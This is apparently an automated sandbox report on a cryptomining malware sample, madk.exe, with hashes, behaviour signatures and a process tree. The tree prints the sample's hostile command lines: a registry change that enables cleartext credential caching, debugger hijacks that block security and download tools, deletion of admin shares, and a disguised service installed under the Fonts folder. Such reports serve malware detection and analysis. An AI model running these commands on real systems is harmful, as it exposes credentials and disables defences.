Analysis
  max time kernel: 150s
  max time network: 145s
  platform: windows10-2004_x64
  resource: win10v2004-20220812-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 26-09-2022 23:59

Behavioral task: behavioral1
  Sample: madk.exe
  Resource: win10-20220812-en

Behavioral task: behavioral2
  Sample: madk.exe
  Resource: win10v2004-20220812-en
General
  Target: madk.exe
  Size: 3.4MB
  MD5: d00af5991807952929e5b986afd295c9
  SHA1: 7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
  SHA256: 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
  SHA512: c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
  SSDEEP: 98304:jKqtESnFRAW/YS7gCPJDEYFu6GyPuzBPrQ:FnFRV/Bt1E8u6yNQ
Malware Config
Signatures
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
  wevtutil.exe pids: 4284, 2896, 1348
XMRig Miner payload 4 IoCs
Processes:
  resource  yara_rule
  behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp  xmrig
  C:\Windows\Fonts\rundlls.exe  xmrig
  \??\c:\windows\Fonts\rundlls.exe  xmrig
  behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp  xmrig
Executes dropped EXE 17 IoCs
Processes:
  pid   process
  3540  svchost.exe
  2664  svchost.exe
  1764  svchost.exe
  2164  svchost.exe
  4848  svchost.exe
  3568  svchost.exe
  4072  conhost.exe
  2888  svchost.exe
  5100  svchost.exe
  3544  svchost.exe
  3676  svchost.exe
  4128  svchost.exe
  1044  svchost.exe
  4440  svchost.exe
  4996  svchost.exe
  1764  svchost.exe
  2640  rundlls.exe
Sets file execution options in registry 2 TTPs 20 IoCs
Processes:
  description  ioc  process
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe"  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe"  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe"  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe"  reg.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe  reg.exe
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
  attrib.exe pids: 4016, 3044, 1388, 4360, 4268
Stops running service(s) 3 TTPs

Processes:
  resource  yara_rule
  behavioral2/memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  \??\c:\windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  \??\c:\windows\Fonts\conhost.exe  upx
  C:\Windows\Fonts\conhost.exe  upx
  behavioral2/memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmp  upx
  behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  C:\Windows\Fonts\svchost.exe  upx
  C:\Windows\Fonts\svchost.exe  upx
  behavioral2/memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmp  upx
  behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp  upx
  behavioral2/memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmp  upx
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description  ioc  process
  Key value queried  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation  madk.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes:
  takeown.exe pids: 460, 1812, 3744, 1884
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description  ioc  process
  File opened (read-only)  \??\E:  svchost.exe
  File opened (read-only)  \??\F:  svchost.exe
  File opened (read-only)  \??\J:  svchost.exe
  File opened (read-only)  \??\M:  svchost.exe
  File opened (read-only)  \??\O:  svchost.exe
  File opened (read-only)  \??\U:  svchost.exe
  File opened (read-only)  \??\Y:  svchost.exe
  File opened (read-only)  \??\B:  svchost.exe
  File opened (read-only)  \??\I:  svchost.exe
  File opened (read-only)  \??\K:  svchost.exe
  File opened (read-only)  \??\T:  svchost.exe
  File opened (read-only)  \??\V:  svchost.exe
  File opened (read-only)  \??\X:  svchost.exe
  File opened (read-only)  \??\G:  svchost.exe
  File opened (read-only)  \??\N:  svchost.exe
  File opened (read-only)  \??\S:  svchost.exe
  File opened (read-only)  \??\H:  svchost.exe
  File opened (read-only)  \??\L:  svchost.exe
  File opened (read-only)  \??\P:  svchost.exe
  File opened (read-only)  \??\Q:  svchost.exe
  File opened (read-only)  \??\R:  svchost.exe
  File opened (read-only)  \??\W:  svchost.exe
  File opened (read-only)  \??\Z:  svchost.exe
  File opened (read-only)  \??\A:  svchost.exe
Drops file in Windows directory 64 IoCs
Processes:
  description  ioc  process
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  \??\c:\windows\Fonts\rundlls.exe  conhost.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File created  \??\c:\windows\Fonts\rundlls.exe  conhost.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\svchost.exe  attrib.exe
  File opened for modification  C:\Windows\Fonts\sqlservr.exe  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File created  \??\c:\windows\Fonts\WinRing0x64.sys  madk.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
  File opened for modification  C:\Windows\Fonts  attrib.exe
Launches sc.exe 23 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  sc.exe pids: 1744, 2748, 3996, 5024, 4108, 1340, 824, 3160, 4240, 3212, 3004, 4184, 4948, 3808, 4764, 1644, 3692, 5100, 1216, 2980, 776, 4916, 2888
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Kills process with WMI 4 IoCs
Processes:
  WMIC.exe pids: 5088, 1644, 4576, 1856
Kills process with taskkill 14 IoCs
Processes:
  taskkill.exe pids: 1188, 1088, 2464, 4976, 980, 2712, 2716, 4812, 3756, 3504, 5024, 2212, 4572, 4840
Modifies registry class 1 IoCs
Processes:
  description  ioc  process
  Key created  \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings  madk.exe
Modifies registry key 1 TTPs 1 IoCs

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  conhost.exe pid 4072 (the same entry is listed 64 times in the report)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid 668 (no process name given in the report)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description  pid  process
  Token: SeDebugPrivilege  2712  taskkill.exe
  Token: SeDebugPrivilege  5024  taskkill.exe
  Token: SeDebugPrivilege  2716  taskkill.exe
  Token: SeDebugPrivilege  2212  taskkill.exe
  Token: SeDebugPrivilege  1188  taskkill.exe
  Token: SeDebugPrivilege  1088  taskkill.exe
  Token: SeDebugPrivilege  3756  taskkill.exe
  Token: SeDebugPrivilege  4572  taskkill.exe
  Token: SeDebugPrivilege  2464  taskkill.exe
  Token: SeLockMemoryPrivilege  2640  rundlls.exe
  Token: SeAuditPrivilege  3756  svchost.exe
  Token: SeAuditPrivilege  3756  svchost.exe
  Token: SeAuditPrivilege  3756  svchost.exe
  Token: SeIncreaseQuotaPrivilege  5088  WMIC.exe
  Token: SeSecurityPrivilege  5088  WMIC.exe
  Token: SeTakeOwnershipPrivilege  5088  WMIC.exe
  Token: SeLoadDriverPrivilege  5088  WMIC.exe
  Token: SeSystemProfilePrivilege  5088  WMIC.exe
  Token: SeSystemtimePrivilege  5088  WMIC.exe
  Token: SeProfSingleProcessPrivilege  5088  WMIC.exe
  Token: SeIncBasePriorityPrivilege  5088  WMIC.exe
  Token: SeCreatePagefilePrivilege  5088  WMIC.exe
  Token: SeBackupPrivilege  5088  WMIC.exe
  Token: SeRestorePrivilege  5088  WMIC.exe
  Token: SeShutdownPrivilege  5088  WMIC.exe
  Token: SeDebugPrivilege  5088  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  5088  WMIC.exe
  Token: SeRemoteShutdownPrivilege  5088  WMIC.exe
  Token: SeUndockPrivilege  5088  WMIC.exe
  Token: SeManageVolumePrivilege  5088  WMIC.exe
  Token: 33  5088  WMIC.exe
  Token: 34  5088  WMIC.exe
  Token: 35  5088  WMIC.exe
  Token: 36  5088  WMIC.exe
  Token: SeIncreaseQuotaPrivilege  5088  WMIC.exe
  Token: SeSecurityPrivilege  5088  WMIC.exe
  Token: SeTakeOwnershipPrivilege  5088  WMIC.exe
  Token: SeLoadDriverPrivilege  5088  WMIC.exe
  Token: SeSystemProfilePrivilege  5088  WMIC.exe
  Token: SeSystemtimePrivilege  5088  WMIC.exe
  Token: SeProfSingleProcessPrivilege  5088  WMIC.exe
  Token: SeIncBasePriorityPrivilege  5088  WMIC.exe
  Token: SeCreatePagefilePrivilege  5088  WMIC.exe
  Token: SeBackupPrivilege  5088  WMIC.exe
  Token: SeRestorePrivilege  5088  WMIC.exe
  Token: SeShutdownPrivilege  5088  WMIC.exe
  Token: SeDebugPrivilege  5088  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  5088  WMIC.exe
  Token: SeRemoteShutdownPrivilege  5088  WMIC.exe
  Token: SeUndockPrivilege  5088  WMIC.exe
  Token: SeManageVolumePrivilege  5088  WMIC.exe
  Token: 33  5088  WMIC.exe
  Token: 34  5088  WMIC.exe
  Token: 35  5088  WMIC.exe
  Token: 36  5088  WMIC.exe
  Token: SeIncreaseQuotaPrivilege  1644  WMIC.exe
  Token: SeSecurityPrivilege  1644  WMIC.exe
  Token: SeTakeOwnershipPrivilege  1644  WMIC.exe
  Token: SeLoadDriverPrivilege  1644  WMIC.exe
  Token: SeSystemProfilePrivilege  1644  WMIC.exe
  Token: SeSystemtimePrivilege  1644  WMIC.exe
  Token: SeProfSingleProcessPrivilege  1644  WMIC.exe
  Token: SeIncBasePriorityPrivilege  1644  WMIC.exe
  Token: SeCreatePagefilePrivilege  1644  WMIC.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
  rundlls.exe pid: 2640
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
  pid   process
  3460  madk.exe
  3460  madk.exe
  4072  conhost.exe
  4072  conhost.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description  pid  process  target process
  PID 3460 wrote to memory of 3520  3460  madk.exe  cmd.exe
  PID 3460 wrote to memory of 3520  3460  madk.exe  cmd.exe
  PID 3460 wrote to memory of 3520  3460  madk.exe  cmd.exe
  PID 3460 wrote to memory of 520  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 520  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 520  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4248  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4248  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4248  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4584  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4584  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 4584  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 2088  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 2088  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 2088  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 3392  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 3392  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 3392  3460  madk.exe  reg.exe
  PID 3460 wrote to memory of 1216  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1216  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1216  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4184  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4184  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4184  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1340  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1340  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1340  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 3808  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 3808  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 3808  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4948  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4948  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4948  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1744  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1744  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 1744  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4764  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4764  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 4764  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 2748  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 2748  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 2748  3460  madk.exe  sc.exe
  PID 3460 wrote to memory of 2712  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2712  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2712  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 5024  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 5024  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 5024  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2716  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2716  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2716  3460  madk.exe  taskkill.exe
  PID 3460 wrote to memory of 2536  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 2536  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 2536  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 5056  3460  madk.exe  net1.exe
  PID 3460 wrote to memory of 5056  3460  madk.exe  net1.exe
  PID 3460 wrote to memory of 5056  3460  madk.exe  net1.exe
  PID 3520 wrote to memory of 3936  3520  cmd.exe  attrib.exe
  PID 3520 wrote to memory of 3936  3520  cmd.exe  attrib.exe
  PID 3520 wrote to memory of 3936  3520  cmd.exe  attrib.exe
  PID 3460 wrote to memory of 232  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 232  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 232  3460  madk.exe  net.exe
  PID 3460 wrote to memory of 1644  3460  madk.exe  sc.exe
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
  attrib.exe pids: 2932, 1976, 3764, 4804, 1644, 2860, 4536, 3416, 4028, 4568, 384, 2248, 4744, 3508, 2916, 2248, 1528, 4900, 4828, 2712, 4140, 4008, 460, 4556, 860, 960, 2472, 2992, 2936, 4844, 744, 4296, 4892, 4764, 4464, 5012, 704, 916, 116, 2264, 4176, 3428, 1636, 3896, 520, 3848, 4396, 4764, 940, 3832, 2500, 3936, 3272, 420, 3936, 4364, 2840, 2248, 4660, 4680, 3704, 2020, 776, 4268
Processes
(process tree; [n] is the depth shown in the report, the image path is followed by the command line it was started with)

[1] C:\Users\Admin\AppData\Local\Temp\madk.exe
    command: "C:\Users\Admin\AppData\Local\Temp\madk.exe"
    - Checks computer location settings
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      command: cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe
        command: attrib -s -h -r -a C:\Windows\Fonts
        - Views/modifies file attributes
  [2] C:\Windows\SysWOW64\reg.exe
      command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
      - Modifies registry key
  [2] C:\Windows\SysWOW64\reg.exe
      command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
      - Sets file execution options in registry
  [2] C:\Windows\SysWOW64\reg.exe
      command: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
  [2] C:\Windows\SysWOW64\reg.exe
      command: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
      - Sets file execution options in registry
  [2] C:\Windows\SysWOW64\reg.exe
      command: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete MetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc stop SetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc stop MicrosotMaims
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete SetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc stop MetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete MicrosotMaims
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc stop MicrosotMais
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete MicrosotMais
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\taskkill.exe
      command: taskkill /f /t /im d1lhots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe
      command: taskkill /f /t /im dl1hots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe
      command: taskkill /f /t /im rundlls.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete mssecsvc2.0
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\net.exe
      command: net stop mssecsvc2.1
    [3] C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 stop mssecsvc2.1
  [2] C:\Windows\SysWOW64\net.exe
      command: net stop mssecsvc2.0
    [3] C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 stop mssecsvc2.0
  [2] C:\Windows\SysWOW64\net1.exe
      command: net1 user mm123$ /del
  [2] C:\Windows\SysWOW64\sc.exe
      command: sc delete mssecsvc2.1
      - Launches sc.exe
  [2] \??\c:\windows\Fonts\svchost.exe
      command: c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe
      command: c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe
      command: c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
      - Executes dropped EXE
  [2] C:\Windows\SysWOW64\net.exe
      command: net user mm123$ /del
  [2] \??\c:\windows\Fonts\svchost.exe
      command: c:\windows\Fonts\svchost.exe start MetPipAtcivator
      - Executes dropped EXE
  [2] C:\Windows\SysWOW64\cmd.exe
      command: cmd /c C:\Windows\TEMP\csonhost.bat
    [3] C:\Windows\SysWOW64\reg.exe
        command: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
    [3] C:\Windows\SysWOW64\PING.EXE
        command: ping 127.1 -n 5
        - Runs ping.exe
    [3] C:\Windows\SysWOW64\net.exe
        command: net share iPC$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share iPC$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        command: net share admin$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share admin$ /delete
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc start MetPipAtcivator
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\net.exe
        command: net share c$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share c$ /delete
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc start MetPipAtcivator
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\net.exe
        command: net share d$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share d$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        command: net share e$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share e$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        command: net share f$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 share f$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        command: net stop lanmanserver /y
      [4] C:\Windows\SysWOW64\net1.exe
          command: C:\Windows\system32\net1 stop lanmanserver /y
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc config lanmanserver start= DISABLED
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc start PolicyAgent
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc config PolicyAgent start= AUTO
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc stop Graphipcs_PerfSvcs
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        command: sc delete Graphipcs_PerfSvcs
        - Launches sc.exe
